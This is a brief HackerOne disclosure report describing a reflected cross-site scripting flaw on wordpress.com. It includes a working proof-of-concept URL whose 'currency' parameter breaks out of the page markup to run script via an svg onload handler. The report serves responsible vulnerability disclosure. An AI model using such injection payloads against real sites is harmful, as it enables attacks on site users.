Automattic: XSS on www.wordpress.com

2016-04-23T03:56:17
ID H1:133963
Type hackerone
Reporter spam404
Modified 2016-04-28T06:56:22

Description

Hey,

I found an XSS vulnerability on www.wordpress.com

Here's a proof-of-concept working in the latest version of Firefox - https://wordpress.com/website/?currency=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28document.domain%29%3E